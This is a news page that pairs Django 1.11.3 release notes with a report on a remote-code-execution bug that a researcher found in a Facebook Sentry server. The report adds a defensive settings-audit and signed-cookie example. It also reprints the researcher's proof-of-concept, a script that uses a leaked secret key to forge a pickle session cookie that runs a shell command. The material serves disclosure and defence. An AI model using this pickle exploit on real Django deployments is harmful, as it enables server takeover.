Django 1.11.3 released

The popular Python framework has received a new update that brings new features and bugfixes.
05 July 2017

Good news for all Python coders and Django users: version 1.11.3 is out.

List of fixed issues

  • Removed an incorrect deprecation warning about a missing renderer argument if a Widget.render() method accepts **kwargs.
  • Fixed a regression causing Model.__init__() to crash if a field has an instance only descriptor.
  • Fixed an incorrect DisallowedModelAdminLookup exception when using a nested reverse relation in list_filter.
  • Fixed admin’s FieldListFilter.get_queryset() crash on invalid input.
  • Fixed invalid HTML for a required AdminFileWidget.
  • Fixed model initialization to set the name of class-based model indexes for models that only inherit models.Model.
  • Fixed crash in admin’s inlines when a model has an inherited non-editable primary key.
  • Fixed QuerySet.union(), intersection(), and difference() when combining with an EmptyQuerySet.
  • Prevented Paginator’s unordered object list warning from evaluating a QuerySet.
  • Fixed the value of redirect_field_name in LoginView’s template context. It’s now an empty string (as it is for the original function-based login() view) if the corresponding parameter isn’t sent in a request (in particular, when the login page is accessed directly).
  • Prevented attribute values in the django/forms/widgets/attrs.html template from being localized so that numeric attributes (e.g. max and min) of NumberInput work correctly.
  • Removed casting of the option value to a string in the template context of the CheckboxSelectMultiple, NullBooleanSelect, RadioSelect, SelectMultiple, and Select widgets. In Django 1.11.1, casting was added in Python to avoid localization of numeric values in Django templates, but this made some use cases more difficult. Casting is now done in the template using the |stringformat:'s' filter.
  • Prevented a primary key alteration from adding a foreign key constraint if db_constraint=False.
  • Fixed UnboundLocalError crash in RenameField with nonexistent field.
  • Fixed a regression preventing a model field’s limit_choices_to from being evaluated when a ModelForm is instantiated.

Another Facebook Vulnerability to be Found

A cybersecurity specialist from SCRT found a way to execute code remotely on a Facebook server
27 August 2018

Daniel Le Gall from SCRT reported a vulnerability he found in one of Facebook's servers. The problem was in Sentry, a log-storage web application written in Python using the Django framework. Facebook engineers have already patched the security hole on the server.

Daniel found the problem while scanning IP addresses belonging to the social network. One of them hosted a Sentry service with the host name sentryagreements.thefacebook.com. While reviewing the application, he noticed a stack trace that appeared for no apparent reason, along with problems in the password-reset function. According to him, Django debug mode had not been disabled, so the trace exposed the program's entire environment:

[Screenshot: Facebook Vulnerability]

Among the environment keys, the SCRT expert found SESSION_SERIALIZER set to django.contrib.sessions.serializers.PickleSerializer. Daniel explained that a forged session containing arbitrary content in Python's binary Pickle object-serialization format lets an attacker run any code on the system. To forge a session he needed the Django secret key, which appeared in plaintext in the list of Sentry settings under the name system.secret-key:

[Screenshot: Facebook Vulnerability]
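The two weaknesses described above (debug mode left on, which prints settings such as the secret key on error pages, and a session serializer based on pickle, which turns a leaked SECRET_KEY into code execution) are both things a deployment check can catch. The following added example is not from the article or from SCRT; it is an illustration written for this page. It uses no Django code: the settings dictionaries are constructed for the example, the audit rules are a simplified version of what a deploy check would do, and the signed-cookie functions are a minimal stand-in for Django's signing module that show why a JSON serializer closes the pickle hole: HMAC only guarantees integrity, so whoever holds the key can write any payload, and the serializer decides whether that payload can carry objects at all.

```python
"""Defender-side checks for the Sentry/Django issue above (example code).

Part 1 audits a Django-style settings mapping for the three risky settings
the article mentions. Part 2 implements a tiny signed session cookie that
serializes with JSON, so a payload can never contain an executable object.
"""
import base64
import hashlib
import hmac
import json

PICKLE_SERIALIZER = "django.contrib.sessions.serializers.PickleSerializer"
JSON_SERIALIZER = "django.contrib.sessions.serializers.JSONSerializer"
# Placeholder values an audit should never accept as a real key.
WEAK_KEYS = {"", "changeme", "secret", "[RETRIEVEDKEY]"}

# Constructed settings for the demo; the risky one mirrors the combination
# the researcher found, the values themselves are made up.
RISKY_SETTINGS = {
    "DEBUG": True,
    "SESSION_SERIALIZER": PICKLE_SERIALIZER,
    "SECRET_KEY": "changeme",
}
HARDENED_SETTINGS = {
    "DEBUG": False,
    "SESSION_SERIALIZER": JSON_SERIALIZER,
    # Constructed, obviously fake key that is long enough to pass the audit.
    "SECRET_KEY": "example-only-not-a-real-key-" + "0123456789abcdef" * 2,
}


def audit_settings(settings):
    """Return a list of findings (empty means no issue found)."""
    findings = []
    if settings.get("DEBUG"):
        findings.append("DEBUG=True: error pages print settings and environment")
    if settings.get("SESSION_SERIALIZER", JSON_SERIALIZER) == PICKLE_SERIALIZER:
        findings.append("SESSION_SERIALIZER=PickleSerializer: a leaked "
                        "SECRET_KEY becomes code execution")
    key = settings.get("SECRET_KEY", "")
    if key in WEAK_KEYS or len(key) < 50:
        findings.append("SECRET_KEY is missing, a placeholder, or shorter than 50 chars")
    return findings


def _signature(key, salt, payload):
    """HMAC-SHA256 over salt+payload, URL-safe base64 without padding."""
    mac = hmac.new(key.encode(), (salt + payload).encode(), hashlib.sha256)
    return base64.urlsafe_b64encode(mac.digest()).decode().rstrip("=")


def sign_session(data, key, salt="session"):
    """Serialize with JSON and append an HMAC.

    json.dumps raises TypeError for anything that is not plain data, so an
    object that would carry code under pickle cannot enter the cookie.
    """
    raw = json.dumps(data, sort_keys=True).encode()
    payload = base64.urlsafe_b64encode(raw).decode().rstrip("=")
    return payload + ":" + _signature(key, salt, payload)


def load_session(cookie, key, salt="session"):
    """Verify the HMAC in constant time, then decode the JSON payload."""
    payload, _, sig = cookie.rpartition(":")
    if not hmac.compare_digest(sig, _signature(key, salt, payload)):
        raise ValueError("bad session signature")
    padded = payload + "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


def tampering_is_detected(key="k" * 50):
    """Reuse a valid signature on a changed payload; loading must fail."""
    cookie = sign_session({"user": "alice"}, key)
    _, _, sig = cookie.rpartition(":")
    forged = base64.urlsafe_b64encode(
        json.dumps({"user": "admin"}).encode()).decode().rstrip("=")
    try:
        load_session(forged + ":" + sig, key)
    except ValueError:
        return True
    return False


def object_payload_is_rejected(key="k" * 50):
    """A non-JSON object cannot be placed in the session at all."""
    try:
        sign_session({"testcookie": object()}, key)
    except TypeError:
        return True
    return False


if __name__ == "__main__":
    for name, cfg in (("risky", RISKY_SETTINGS), ("hardened", HARDENED_SETTINGS)):
        print(name, audit_settings(cfg))
    print("tampering detected:", tampering_is_detected())
    print("object payload rejected:", object_payload_is_rejected())
```

The audit deliberately treats the serializer and the key as one finding pair: with JSONSerializer a leaked key still lets someone forge a logged-in session, but it no longer lets them run code, which is the difference between an account problem and a server compromise. Django's own deployment checks flag a short SECRET_KEY and DEBUG=True in a similar way; running them before exposing an instance would have caught two of the three conditions here.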

The researcher wrote a proof-of-concept script that replaced the existing contents of the sentrysid cookie with an arbitrary object and made the page take 30 seconds longer to load:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os

SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()

print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

He reported the vulnerability to the Facebook team and received $5,000 under the Bug Bounty program. The company's specialists fixed the issue within 10 days of receiving the report.